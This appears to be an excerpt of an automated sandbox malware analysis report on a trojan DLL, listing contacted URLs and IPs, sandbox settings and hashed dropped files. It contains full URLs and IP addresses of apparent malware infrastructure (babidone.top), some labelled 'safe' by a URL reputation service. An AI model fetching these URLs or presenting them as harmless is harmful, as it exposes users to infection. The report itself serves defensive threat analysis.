            http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R | {8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat.24.dr | false | Avira URL Cloud: safe | unknown
            http://www.reddit.com/ | msapplication.xml4.16.dr | false | | high
            http://www.twitter.com/ | msapplication.xml5.16.dr | false | | high
            https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p | loaddll32.exe, 00000001.00000002.589354244.000000000050B000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

                        Contacted IPs


                        Public

                        IP | Domain | Country | ASN | ASN Name | Malicious
                        193.56.255.166 | unknown | Romania | 213137 | INFOCLOUD-SRLMD | false
                        47.91.89.242 | unknown | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:338663
                        Start date:12.01.2021
                        Start time:18:08:32
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 7m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:zQ32b1FVcL.dll
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:40
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal64.troj.winDLL@13/44@4/3
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 44.9% (good quality ratio 43.6%)
                        • Quality average: 81.3%
                        • Quality standard deviation: 26.6%
                        HCA Information:
                        • Successful, ratio: 81%
                        • Number of executed functions: 42
                        • Number of non-executed functions: 37
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .dll
                        Warnings:
                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
                        • Excluded IPs from analysis (whitelisted): 104.42.151.234, 168.61.161.212, 40.88.32.150, 104.79.90.110, 51.104.139.180, 92.122.213.247, 92.122.213.194, 88.221.62.148, 67.27.157.254, 8.248.139.254, 67.26.139.254, 8.248.115.254, 8.248.131.254, 20.54.26.129, 152.199.19.161, 52.155.217.156
                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, updates.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        Match | Associated Sample Name / URL | Detection
                        193.56.255.166 | OgQJzDbLce.dll | malicious

                          Domains

                          Match | Associated Sample Name / URL | Detection | Context
                          begoventa.top | OgQJzDbLce.dll | malicious | 92.38.132.181
                          babidone.top | OgQJzDbLce.dll | malicious | 193.56.255.166

                          ASN

                          Match | Associated Sample Name / URL | Detection | Context
                          INFOCLOUD-SRLMD | OgQJzDbLce.dll | malicious | 193.56.255.166
                          INFOCLOUD-SRLMD | 5fd9d7ec9e7aetar.dll | malicious | 193.56.255.167

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{72A6A8A2-5544-11EB-90E4-ECF4BB862DED}.dat
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:Microsoft Word Document
                          Category:dropped
                          Size (bytes):29272
                          Entropy (8bit):1.769384176506226
                          Encrypted:false
                          SSDEEP:48:IwnhGcprZ6GwpLfTG/ap8scrGIpcMGAGvnZpvMiGo3qp9MVGo4FpmMcMGWBXHGWB:rXZYZ72B9WMotM5fM+FMMybb+B
                          MD5:3AE94EF99BB24395A544FEB78372A9B4
                          SHA1:B9BF9F3EAA85022159E875171B7CBA7D78ABF7EA
                          SHA-256:8D41CC000A6E5405F58CA7D9AE44A4553BE4ADE7FCDDDE419D1D6A64799D9615
                          SHA-512:1FEB0E03DE945D281B980F502049B36D3113FE734395C312381402A3AB8386A4F8D1254F53627FC3D8D754F1161A5697FCE399E70A2CB309FA0E478F69DB8F4A
                          Malicious:false
                          Reputation:low
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8CB598BA-5544-11EB-90E4-ECF4BB862DED}.dat
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:Microsoft Word Document
                          Category:dropped
                          Size (bytes):29272
                          Entropy (8bit):1.7710312124199559
                          Encrypted:false
                          SSDEEP:48:IwlGcpr4GwpL2G/ap8RrGIpc5KGvnZpv5LGoVqp95TGo4Rpm5YGWfVpGW1T6p7GT:r7ZgZ02R9W53t54f5ERM5t163B
                          MD5:29C4A3C89669918F62E835D432287FE6
                          SHA1:8B7FDC121BBC6CB80E84CD628C5ABF77E78982A1
                          SHA-256:9BD4CA23B69DEFECB872EB2112597A065EA4F4798349956856038B0FCA4CCF63
                          SHA-512:7E9004133BC8A973CF8181DA45B8A65DF075F7A3162E31734F9D19DBF46BEC3C6178651AFFCD504C1B182E0C2BE3CF722AABADD8B585F2BD7031087A8DE7D8FE
                          Malicious:false
                          Reputation:low
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A2FA2B65-5544-11EB-90E4-ECF4BB862DED}.dat
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:Microsoft Word Document
                          Category:dropped
                          Size (bytes):29272
                          Entropy (8bit):1.7731704980611467
                          Encrypted:false
                          SSDEEP:48:IwpGcprThGwpLnIG/ap8ePrGIpcOxbGvnZpvOkNGotqp9OkVkGo4xpmOtcV0GW3e:rvZT7ZnC2eP9WOx8tOPfO6xMOIxLLB
                          MD5:D0B87D1E0FB5C60B37D1EDDA7658A862
                          SHA1:5B703AF3293216040C41C3030FFB66F9E0A45CD8
                          SHA-256:7BC698F5CAAE1F21A6174F2B086160F073395E64E35407988957DDD8C64D48EE
                          SHA-512:84FF9B9BA65749275AFA841992FC6A014737E511E5095E3F2D5B872AC6033683255D5DB29DA33D8ABA5701DEA0F48761F054A1406EFC6A2AA7E8F70044799FB5
                          Malicious:false
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B10F0CC4-5544-11EB-90E4-ECF4BB862DED}.dat
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:Microsoft Word Document
                          Category:dropped
                          Size (bytes):29272
                          Entropy (8bit):1.7729096824956627
                          Encrypted:false
                          SSDEEP:48:Iw6GcprLGwpLaG/ap8FrGIpcmiGvnZpvmiGoYqp9mhGo4Bpmmw6aGWm2QGWUT6p0:r+ZFZA2F9WmPtmGfmSBMmtNMZzB
                          MD5:29A3292D1A3B0638CB589518AC067AC9
                          SHA1:EC81BACBCA78F545996995D9B2A02487A87EF087
                          SHA-256:FBC81954483148ACF4ABFE5D92FF0A8324D00FEEBB2146C93BC71FF7A706AF08
                          SHA-512:EBB9748BD2C8D9C9998C90EB2FB68F8175B69F04B55FC3A99E23B1CEF513EB89746A70E29EB195817465E1456217E199AA562742780F02810E76B5212E2DF183
                          Malicious:false
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{72A6A8A4-5544-11EB-90E4-ECF4BB862DED}.dat
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:Microsoft Word Document
                          Category:dropped
                          Size (bytes):27368
                          Entropy (8bit):1.8431154863360353
                          Encrypted:false
                          SSDEEP:192:ryZxQP61kWFjV2YkWEMbYiFWNnxFWNS2iA:ruGC+WhMcxbHFWNxFWNS2V
                          MD5:98EF5675ACFCE587633A4CA29F8A53B6
                          SHA1:441CB4E3A543165E2C14C8D9569A967BBCFB7C1D
                          SHA-256:13FBB6DC3F8B2C0A58E8D5AEE76011B9C061BF3BF6420F1F141C0DB98FDB71B3
                          SHA-512:9D6A2FBDD2B0F407FD84C39B80B6FDCAFD22ABF3E02AA0342F8C11B10BE2DAF3A322F9699446931F67CC69F2D4B11016FA9D2B41348A392273534E186C1C466C
                          Malicious:false
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:Microsoft Word Document
                          Category:dropped
                          Size (bytes):27376
                          Entropy (8bit):1.846090409968756
                          Encrypted:false
                          SSDEEP:48:IwfGcpryGwpaPG4pQ3GrapbSHrGQpBiGHHpcosTGUp8xGzYpm0xYGopo6LEVlMqm:r1Z6QB6LBSHFj52okW/MKY6pU3xpUu6A
                          MD5:CA15393407EF61E6646343D4CF05980A
                          SHA1:52729C1EFEACC636AB3151D2D5C3B6D42806A5BC
                          SHA-256:014541CE1CE269C81F7F18CEA7922EDB3BD5FADA19BB0CADAC6F264B832218F1
                          SHA-512:4FCA49FCC672C076083A441AC7069B8FC770FC75F1391872E987DB025DE8845135A1A7B208E4521EA4DAEFAF872DC6559FD5111BD32C83D1A1644261845DE020
                          Malicious:false
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A2FA2B67-5544-11EB-90E4-ECF4BB862DED}.dat
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:Microsoft Word Document
                          Category:dropped
                          Size (bytes):27864
                          Entropy (8bit):1.8245195311791338
                          Encrypted:false
                          SSDEEP:48:Iw3GcprSGwpaGG4pQSGrapbSjrGQpBCGHHpcgsTGUp8oGzYpmiuYGopQEltrzDGd:r9ZaQ26UBSjFjZ2gkWsMfYS+gR+Mr
                          MD5:A1413466758220F73DEED46E91F9756A
                          SHA1:5E19A3B8C6362C66E4CD56EB186F05C7A71CB3B8
                          SHA-256:50A092C1980431F511B130979317818920BA9FA67691B7DC0A8823892F6B3119
                          SHA-512:8464507EBCD7A671C7BAC35990202422BBA3EAC2B415B1F802961DFDABBC1D3BBB7593A559FBBC3B55C74F6C84D7C64DFE60F7C331E86F673C044BEAFE7725E9
                          Malicious:false
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:Microsoft Word Document
                          Category:dropped
                          Size (bytes):27360
                          Entropy (8bit):1.8405411493608728
                          Encrypted:false
                          SSDEEP:96:rrZQQ86KBSxFjxn2KkWCMIcYqEOYSREOYdzKA:rrZQQ86KkxFjxn2KkWCMIcYqEiRENzKA
                          MD5:24F2A9DDEC3F9966E5B4E0D0553D0C9C
                          SHA1:C12245E6657FDC26BE62E45312629459BE08BA14
                          SHA-256:5A5D80B9ACB62503C5B17BD0EE1D164089DB55C31C652BC861FF6458495C21EE
                          SHA-512:5217E67AF8E070387390C163758B17496825269001DDCA78B6C437A62F414B8205AEF08B3D8C054F07CCE51701BDD04E846B579A7D69B935C736F96AC760EBA4
                          Malicious:false
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):656
                          Entropy (8bit):5.100241569421958
                          Encrypted:false
                          SSDEEP:12:TMHdNMNxOEwW2UW2vnWimI002EtM3MHdNMNxOEwW2UW2vnWimI00ObVbkEtMb:2d6NxOMqcSZHKd6NxOMqcSZ76b
                          MD5:2C436588E3D6DCF7FE89112328B3E730
                          SHA1:4164F8038964A5A9384EF22402A93EDEE75EB21C
                          SHA-256:08D1B15B701CD6919F93D0E26C9B501DF224789204A85F1CD22B65F72DBFDA8D
                          SHA-512:B6F212B2B49C1F59232B5523440C5B3F1F73301188BD4D8CA6C758392A313018F77F595F7A3BBEE908ACC83A4A8D80AB5836930083469D8D96C730C6B0747824
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):653
                          Entropy (8bit):5.173699561853213
                          Encrypted:false
                          SSDEEP:12:TMHdNMNxe2kwc0cPnWimI002EtM3MHdNMNxe2kwc0a4nWimI00Obkak6EtMb:2d6Nxr2SZHKd6Nxro4SZ7Aa7b
                          MD5:18108C1538C400F573ED71BF12A57228
                          SHA1:D3AD68F727F86A97FF01D69CD0CD824999B74D32
                          SHA-256:DF85CE99B84855741812B93F31942C9766FED19D528FC98BE950AA91997D8F45
                          SHA-512:0B350664E7C4472F54F452A290F005ED1302A9CE7D3DD226553A2342EA83D770F2A39DFFE95827C6D8448770A27992E3042F97452EE8CE1976FF18CC57B9CB8D
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x48298613,0x01d6e951</date><accdate>0x48298613,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x48298613,0x01d6e951</date><accdate>0x482be878,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):662
                          Entropy (8bit):5.135413702811249
                          Encrypted:false
                          SSDEEP:12:TMHdNMNxvLwWYZWYanWimI002EtM3MHdNMNxvLwWYZWYanWimI00ObmZEtMb:2d6Nxv3f/SZHKd6Nxv3f/SZ7mb
                          MD5:647C1BD469F8A2E152BB8CDE9294BDA2
                          SHA1:7CDC043A343B5654844743DE41430C34770684A8
                          SHA-256:D77AEFB653210521D7EED77736BBCC9DD39B79D3C8B01C3864295CA529701696
                          SHA-512:82345CF268E17184320BFDE399FAFB4D3FEAD5B141FCAB2E8E45C458D7915199CDDEB19EF25F414C908221F7B76CDB4F0221C60C5CB05D418B7F0E9C4C9C2C91
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):647
                          Entropy (8bit):5.112516029119953
                          Encrypted:false
                          SSDEEP:12:TMHdNMNxiwWubmWubpnWimI002EtM3MHdNMNxiwWubmWubpnWimI00Obd5EtMb:2d6NxSuISZHKd6NxSuISZ7Jjb
                          MD5:CE75127F3FE5FF1F42A6465CB5948887
                          SHA1:B750B0E975B083CE241678BC85ABE0C1AFBF057E
                          SHA-256:C9A450FD56CB3D9039BF84EF161F5D8BD91307396AA7C530666AF811145847C1
                          SHA-512:013AEF41A65E85B923BF9D1CCF8BF373191E1DA9F527B346FAC0A6DB97DB37127E13DB3314621CD4B0610582B03CD9372CB7492A93B16C6E18F780DF8B6BDA5E
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):656
                          Entropy (8bit):5.154826181095927
                          Encrypted:false
                          SSDEEP:12:TMHdNMNxhGwwWYZWYanWimI002EtM3MHdNMNxhGwwWYZWyNanWimI00Ob8K075Es:2d6NxQof/SZHKd6NxQofyNaSZ7YKajb
                          MD5:9C0ED05861F4BEABF0296BCF3CB7A3FC
                          SHA1:AB9D6DCB20A34A858CBB692AFFE2B2DF14576B80
                          SHA-256:EFCFC15BFFB9677764C6DB26CC1E63341E8C816BEA1C8AD394CCFC21566AE0AC
                          SHA-512:AA587BC104BCC412DA3E042243F4FBF8044B0E41821C19491BE48AEAF9132C271E7FC4584677AD3C6807DFC7E63C4993668E191884A551A5D2D5683B6D486489
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x4837d4a4,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):653
                          Entropy (8bit):5.103439486630095
                          Encrypted:false
                          SSDEEP:12:TMHdNMNx0nwW2UW2vnWimI002EtM3MHdNMNx0nwW2UW2vnWimI00ObxEtMb:2d6Nx0jqcSZHKd6Nx0jqcSZ7nb
                          MD5:ADA9C3D86BF31E7FFB632FBD5C1472EA
                          SHA1:2F2649ADCE55986DFE8BB4214AFB2877C6D6E87D
                          SHA-256:6CC12B67772FA86AE2203F8D133A7461C812F249ED494BF88AB9DA63F880648B
                          SHA-512:1B765EBA71145EDB3B31569A4208AC3922E7DC484D006564BD6A11D2935DF2805967AE9A72A4FFC9AEFE693ED2BDDA6E08AF2D8C4F9632AAC7DF8343C620BB18
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):656
                          Entropy (8bit):5.1405293489180375
                          Encrypted:false
                          SSDEEP:12:TMHdNMNxxwWubmWubpnWimI002EtM3MHdNMNxxwWubmW2vnWimI00Ob6Kq5EtMb:2d6Nx9uISZHKd6Nx9ucSZ7ob
                          MD5:F10D9015D97537E4CC5CA07F9145B361
                          SHA1:87D64C880746B28A387A235D0C452AD04695606A
                          SHA-256:6A4B68122EAAAD5791D23E9EBB567BFEDECE7E59678C06927B79806494D7BE71
                          SHA-512:3402E6938902C99946EB10A06B7F3F7096DAA26BC6A102948F8BD94A66A7801E136773FE28958C25FA4782A4C0ACA676BDD560EE540A38669073A80FDDC0213A
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):659
                          Entropy (8bit):5.151946553913353
                          Encrypted:false
                          SSDEEP:12:TMHdNMNxcwaraUnWimI002EtM3MHdNMNxcwaraUnWimI00ObVEtMb:2d6NxEWUSZHKd6NxEWUSZ7Db
                          MD5:C7A54905E71A510F14BCF92F140F4B33
                          SHA1:EF490F8F776D5EC96F24A812857189DCBB22E26C
                          SHA-256:700B1C3E36713F75D4780CF4C6B26E96E4FC9C0FE5DABE2E500A8E6DF0DC3D3E
                          SHA-512:3F3A6788B5AA51FFF8655081378F6337CA4F0B56FA69BE12DB86FC938D3578DE51ECBB2C2064A6E7E4F6DE4ED3A70EC7E6E4DF19B2A2488D8EDC3FEBEB0CBE39
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):653
                          Entropy (8bit):5.098166801838891
                          Encrypted:false
                          SSDEEP:12:TMHdNMNxfnwWubmWubpnWimI002EtM3MHdNMNxfnwWubmWubpnWimI00Obe5EtMb:2d6NxruISZHKd6NxruISZ7ijb
                          MD5:55EA94A0B770ACED3BB3C2E5E706F369
                          SHA1:985BB78AC79E5CB7A82A3063C43B690C5C9F897C
                          SHA-256:0F222996F521DB45250C4E5DC59ADD173AEE6A22B223D50AE850057883A9679A
                          SHA-512:0DB107D21BEC4550AE97540E12152C33AE1EA4D93681D2F6976FF4235C69C88D57ECF4523F3DF84D2725913403ABCAB83299EE9BCDB5733E07C32B8347213A83
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):1612
                          Entropy (8bit):4.869554560514657
                          Encrypted:false
                          SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                          MD5:DFEABDE84792228093A5A270352395B6
                          SHA1:E41258C9576721025926326F76063C2305586F76
                          SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                          SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                          Malicious:false
                          IE Cache URL:res://ieframe.dll/NewErrorPageTemplate.css
                          Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                          Category:downloaded
                          Size (bytes):748
                          Entropy (8bit):7.249606135668305
                          Encrypted:false
                          SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                          MD5:C4F558C4C8B56858F15C09037CD6625A
                          SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                          SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                          SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                          Malicious:false
